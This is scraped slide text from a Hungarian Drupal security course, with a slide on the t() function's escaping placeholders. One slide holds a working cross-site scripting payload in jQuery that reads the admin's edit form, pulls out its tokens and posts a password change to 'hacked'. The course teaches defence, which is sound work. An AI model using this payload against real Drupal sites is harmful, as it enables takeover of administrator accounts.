Más contenido relacionado
Similar a Dcourse security 2010 (10)
Dcourse security 2010
- 42.
Példa
$.get(Drupal.settings.basePath + 'user/1/edit',
function (data, status) {
if (status == 'success') {
var payload = {
"name": data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/)[1],
"mail":
data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/)[1],
"form_id": 'user_profile_form',
"form_token":
data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/)[1],
build_id:
data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/)[1],
"pass[pass1]": 'hacked', "pass[pass2]": 'hacked'
};
$.post(Drupal.settings.basePath + 'user/1/edit', payload);
}
}
);
- 56.
t()
Plain text HTML→
t('@var', array('@var' => $plain_text));
@: plain text
t('%var', array('%var' => $plain_text));
%: kiemelt szöveg
HTML HTML→
t('!var', array('!var' => $html));